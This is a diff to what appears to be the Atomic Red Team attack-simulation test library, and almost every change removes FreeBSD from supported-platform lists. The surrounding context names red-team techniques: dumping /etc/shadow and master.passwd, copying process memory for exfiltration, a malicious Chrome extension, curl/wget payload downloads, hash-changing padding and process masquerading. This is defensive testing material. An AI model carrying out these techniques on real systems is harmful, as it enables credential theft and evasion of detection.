@@ -4586,7 +4578,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -5449,7 +5440,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -5481,7 +5471,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -5516,7 +5505,6 @@ defense-evasion:
|
||||
Setting the creation timestamp requires changing the system clock and reverting.
|
||||
Sudo or root privileges are required to change date. Use with caution.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -5543,7 +5531,6 @@ defense-evasion:
|
||||
|
||||
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -7190,9 +7177,8 @@ defense-evasion:
|
||||
|
||||
Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
file_to_pad:
|
||||
description: Path of binary to be padded
|
||||
@@ -7225,9 +7211,8 @@ defense-evasion:
|
||||
|
||||
Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
file_to_pad:
|
||||
description: Path of binary to be padded
|
||||
@@ -13976,7 +13961,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -14008,7 +13992,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -14039,7 +14022,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -15686,7 +15668,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -15724,7 +15705,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -17093,7 +17073,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -20447,9 +20426,8 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
@@ -29881,9 +29859,8 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
@@ -32038,7 +32015,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -32063,7 +32039,6 @@ execution:
|
||||
|
||||
Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -35452,9 +35427,8 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
@@ -36503,7 +36477,6 @@ persistence:
|
||||
description: Turn on Chrome/Chromium developer mode and Load Extension found
|
||||
in the src directory
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- windows
|
||||
- macos
|
||||
@@ -36521,7 +36494,6 @@ persistence:
|
||||
auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f
|
||||
description: Install the "Minimum Viable Malicious Extension" Chrome extension
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- windows
|
||||
- macos
|
||||
@@ -36538,7 +36510,6 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- windows
|
||||
- macos
|
||||
@@ -39368,9 +39339,8 @@ persistence:
|
||||
persistence on victim host. \nIf the user is able to save the same contents
|
||||
in the authorized_keys file, it shows user can modify the file.\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
@@ -48279,7 +48249,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -48860,7 +48829,6 @@ command-and-control:
|
||||
This test simulates an infected host beaconing to command and control.
|
||||
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -48949,7 +48917,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -48989,7 +48956,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -49028,7 +48994,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -49059,7 +49024,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -49090,7 +49054,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -49121,7 +49084,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -49152,7 +49114,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -49342,9 +49303,8 @@ command-and-control:
|
||||
|
||||
Note that this test may conflict with pre-existing system configuration.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
proxy_server:
|
||||
description: Proxy server URL (host:port)
|
||||
@@ -49703,7 +49663,6 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -49733,7 +49692,6 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -49770,9 +49728,8 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
test_folder:
|
||||
description: Path used to store files.
|
||||
@@ -57401,9 +57358,8 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
search_path:
|
||||
description: Path where to start searching from.
|
||||
@@ -58320,7 +58276,6 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
input_arguments:
|
||||
@@ -58350,9 +58305,8 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
file_path:
|
||||
description: Path to search
|
||||
@@ -58370,9 +58324,8 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
file_path:
|
||||
description: Path to search
|
||||
@@ -60879,7 +60832,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will stdout list of usernames.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -61419,7 +61371,6 @@ discovery:
|
||||
auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2
|
||||
description: "(requires root)\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -61443,7 +61394,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -61466,7 +61416,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -61491,7 +61440,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -62144,7 +62092,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -62169,7 +62116,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -62184,9 +62130,8 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: 'env
|
||||
|
||||
@@ -63010,9 +62955,8 @@ discovery:
|
||||
|
||||
https://perishablepress.com/list-files-folders-recursively-terminal/
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Output file used to store the results.
|
||||
@@ -63038,9 +62982,8 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Output file used to store the results.
|
||||
@@ -63143,7 +63086,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
dependency_executor_name: sh
|
||||
@@ -63427,7 +63369,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will execute ps and output to /tmp/loot.txt.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -63579,9 +63520,8 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: |
|
||||
if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi;
|
||||
@@ -64099,7 +64039,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
dependency_executor_name: sh
|
||||
@@ -64125,7 +64064,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -64559,7 +64497,7 @@ discovery:
|
||||
description: "Identify system time. Upon execution, the local computer system
|
||||
time and timezone will be displayed. \n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: 'date
|
||||
@@ -71126,9 +71064,8 @@ impact:
|
||||
This test simulates a high CPU load as you might observe during cryptojacking attacks.
|
||||
End the test by using CTRL/CMD+C to break.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: 'yes > /dev/null
|
||||
|
||||
@@ -71291,7 +71228,6 @@ impact:
|
||||
Overwrites and deletes a file using DD.
|
||||
To stop the test, break the command with CTRL/CMD+C.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -71690,9 +71626,8 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
timeout:
|
||||
description: Time to restart (can be minutes or specific time)
|
||||
@@ -71710,9 +71645,8 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
timeout:
|
||||
description: Time to shutdown (can be minutes or specific time)
|
||||
@@ -71730,9 +71664,8 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: 'reboot
|
||||
|
||||
@@ -73844,7 +73777,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
input_file:
|
||||
description: Test file to upload
|
||||
@@ -74001,7 +73933,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
domain:
|
||||
description: target SSH domain
|
||||
@@ -74023,7 +73954,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
user_name:
|
||||
description: username for domain
|
||||
@@ -74283,7 +74213,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
file_name:
|
||||
description: File name
|
||||
@@ -74567,7 +74496,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
executor:
|
||||
steps: |
|
||||
1. Victim System Configuration:
|
||||
|
||||
@@ -51018,7 +51018,6 @@ persistence:
|
||||
description: Turn on Chrome/Chromium developer mode and Load Extension found
|
||||
in the src directory
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- windows
|
||||
- macos
|
||||
@@ -51036,7 +51035,6 @@ persistence:
|
||||
auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f
|
||||
description: Install the "Minimum Viable Malicious Extension" Chrome extension
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- windows
|
||||
- macos
|
||||
@@ -51053,7 +51051,6 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- windows
|
||||
- macos
|
||||
|
||||
@@ -85,7 +85,7 @@ Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities
|
||||
copy process memory to an external file so it can be searched or exfiltrated later.
|
||||
On FreeBSD procfs must be mounted.
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** fa37b633-e097-4415-b2b8-c5bf4c86e423
|
||||
@@ -146,7 +146,7 @@ Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script
|
||||
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
|
||||
On FreeBSD procfs must be mounted.
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 437b2003-a20d-4ed8-834c-4964f24eec63
|
||||
|
||||
@@ -55,7 +55,7 @@ atomic_tests:
|
||||
copy process memory to an external file so it can be searched or exfiltrated later.
|
||||
On FreeBSD procfs must be mounted.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -102,7 +102,6 @@ atomic_tests:
|
||||
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
|
||||
On FreeBSD procfs must be mounted.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
|
||||
input_arguments:
|
||||
|
||||
@@ -61,7 +61,7 @@ rm -f #{output_file}
|
||||
## Atomic Test #2 - Access /etc/master.passwd (Local)
|
||||
/etc/master.passwd file is accessed in FreeBSD environments
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 5076874f-a8e6-4077-8ace-9e5ab54114a5
|
||||
@@ -99,7 +99,7 @@ rm -f #{output_file}
|
||||
## Atomic Test #3 - Access /etc/passwd (Local)
|
||||
/etc/passwd file is accessed in FreeBSD and Linux environments
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 60e860b6-8ae6-49db-ad07-5e73edd88f5d
|
||||
@@ -137,7 +137,7 @@ rm -f #{output_file}
|
||||
## Atomic Test #4 - Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat
|
||||
Dump /etc/passwd, /etc/master.passwd and /etc/shadow using ed
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** df1a55ae-019d-4120-bc35-94f4bc5c4b0a
|
||||
@@ -174,7 +174,7 @@ rm -f #{output_file}
|
||||
## Atomic Test #5 - Access /etc/{shadow,passwd,master.passwd} with shell builtins
|
||||
Dump /etc/passwd, /etc/master.passwd and /etc/shadow using sh builtins
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** f5aa6543-6cb2-4fae-b9c2-b96e14721713
|
||||
|
||||
@@ -25,7 +25,7 @@ atomic_tests:
|
||||
description: |
|
||||
/etc/master.passwd file is accessed in FreeBSD environments
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Path where captured results will be placed
|
||||
@@ -44,7 +44,6 @@ atomic_tests:
|
||||
description: |
|
||||
/etc/passwd file is accessed in FreeBSD and Linux environments
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -63,7 +62,6 @@ atomic_tests:
|
||||
description: |
|
||||
Dump /etc/passwd, /etc/master.passwd and /etc/shadow using ed
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -82,7 +80,6 @@ atomic_tests:
|
||||
description: |
|
||||
Dump /etc/passwd, /etc/master.passwd and /etc/shadow using sh builtins
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
|
||||
@@ -119,7 +119,7 @@ systemctl --type=service
|
||||
## Atomic Test #4 - System Service Discovery - service
|
||||
Enumerates system service using service
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** b2e1c734-7336-40f9-b970-b04731cbaf8a
|
||||
|
||||
@@ -50,7 +50,7 @@ atomic_tests:
|
||||
description: |
|
||||
Enumerates system service using service
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
service -e
|
||||
|
||||
@@ -145,7 +145,7 @@ Identify network configuration information.
|
||||
|
||||
Upon successful execution, sh will spawn multiple commands and output will be via stdout.
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 7625b978-4efd-47de-8744-add270374bee
|
||||
|
||||
@@ -60,7 +60,7 @@ atomic_tests:
|
||||
|
||||
Upon successful execution, sh will spawn multiple commands and output will be via stdout.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi;
|
||||
|
||||
@@ -222,7 +222,7 @@ Identify remote systems via arp.
|
||||
|
||||
Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** acb6b1ff-e2ad-4d64-806c-6c35fe73b951
|
||||
@@ -264,7 +264,7 @@ Identify remote systems via ping sweep.
|
||||
|
||||
Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 96db2632-8417-4dbb-b8bb-a8b92ba391de
|
||||
@@ -565,7 +565,7 @@ apt-get install iproute2 -y
|
||||
## Atomic Test #14 - Remote System Discovery - netstat
|
||||
Use the netstat command to display the kernels routing tables.
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** d2791d72-b67f-4615-814f-ec824a91f514
|
||||
|
||||
@@ -87,7 +87,6 @@ atomic_tests:
|
||||
|
||||
Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
dependency_executor_name: sh
|
||||
@@ -109,7 +108,6 @@ atomic_tests:
|
||||
|
||||
Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -277,7 +275,7 @@ atomic_tests:
|
||||
description: |
|
||||
Use the netstat command to display the kernels routing tables.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
netstat -r | grep default
|
||||
|
||||
@@ -18,7 +18,7 @@ Uses dd to add a zero byte, high-quality random data, and low-quality random dat
|
||||
|
||||
Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.
|
||||
|
||||
**Supported Platforms:** Freebsd, macOS, Linux
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** ffe2346c-abd5-4b45-a713-bf5f1ebd573a
|
||||
@@ -71,7 +71,7 @@ Uses truncate to add a byte to the binary to change the hash.
|
||||
|
||||
Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change.
|
||||
|
||||
**Supported Platforms:** Freebsd, macOS, Linux
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** e22a9e89-69c7-410f-a473-e6c212cd2292
|
||||
|
||||
@@ -8,9 +8,8 @@ atomic_tests:
|
||||
|
||||
Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
file_to_pad:
|
||||
description: Path of binary to be padded
|
||||
@@ -40,9 +39,8 @@ atomic_tests:
|
||||
|
||||
Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
file_to_pad:
|
||||
description: Path of binary to be padded
|
||||
|
||||
@@ -122,7 +122,7 @@ Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atom
|
||||
## Atomic Test #3 - C compile
|
||||
Compile a c file with either gcc or clang on FreeBSD, Linux or Macos.
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** d0377aa6-850a-42b2-95f0-de558d80be57
|
||||
@@ -168,7 +168,7 @@ wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004
|
||||
## Atomic Test #4 - CC compile
|
||||
Compile a c file with either gcc or clang on FreeBSD, Linux or Macos.
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** da97bb11-d6d0-4fc1-b445-e443d1346efe
|
||||
@@ -214,7 +214,7 @@ wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004
|
||||
## Atomic Test #5 - Go compile
|
||||
Compile a go file with golang on FreeBSD, Linux or Macos.
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 78bd3fa7-773c-449e-a978-dc1f1500bc52
|
||||
|
||||
@@ -64,7 +64,6 @@ atomic_tests:
|
||||
description: |
|
||||
Compile a c file with either gcc or clang on FreeBSD, Linux or Macos.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -90,7 +89,6 @@ atomic_tests:
|
||||
description: |
|
||||
Compile a c file with either gcc or clang on FreeBSD, Linux or Macos.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -116,7 +114,6 @@ atomic_tests:
|
||||
description: |
|
||||
Compile a go file with golang on FreeBSD, Linux or Macos.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
|
||||
@@ -96,7 +96,7 @@ Creates a base64-encoded data file and decodes it into an executable shell scrip
|
||||
Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that echoes `Hello from the Atomic Red Team`
|
||||
and uname -v
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 197ed693-08e6-4958-bfd8-5974e291be6c
|
||||
|
||||
@@ -41,7 +41,7 @@ atomic_tests:
|
||||
Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that echoes `Hello from the Atomic Red Team`
|
||||
and uname -v
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
shell_command:
|
||||
description: command to encode
|
||||
|
||||
@@ -12,7 +12,7 @@
|
||||
## Atomic Test #1 - Data Transfer Size Limits
|
||||
Take a file/directory, split it into 5Mb chunks
|
||||
|
||||
**Supported Platforms:** macOS, Linux, Freebsd
|
||||
**Supported Platforms:** macOS, Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** ab936c51-10f4-46ce-9144-e02137b2016a
|
||||
|
||||
@@ -8,7 +8,6 @@ atomic_tests:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
file_name:
|
||||
description: File name
|
||||
|
||||
@@ -71,7 +71,7 @@ Identify System owner or users on an endpoint
|
||||
|
||||
Upon successful execution, sh will stdout list of usernames.
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 2a9b677d-a230-44f4-ad86-782df1ef108c
|
||||
|
||||
@@ -33,7 +33,6 @@ atomic_tests:
|
||||
|
||||
Upon successful execution, sh will stdout list of usernames.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
|
||||
@@ -65,7 +65,7 @@ Copies sh process, renames it as crond, and executes it to masquerade as the cro
|
||||
|
||||
Upon successful execution, sh is renamed to `crond` and executed.
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** a315bfff-7a98-403b-b442-2ea1b255e556
|
||||
|
||||
@@ -23,7 +23,6 @@ atomic_tests:
|
||||
|
||||
Upon successful execution, sh is renamed to `crond` and executed.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
|
||||
@@ -16,7 +16,7 @@ Adversaries may also use the same icon of the file they are trying to mimic.</bl
|
||||
## Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory.
|
||||
Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)
|
||||
|
||||
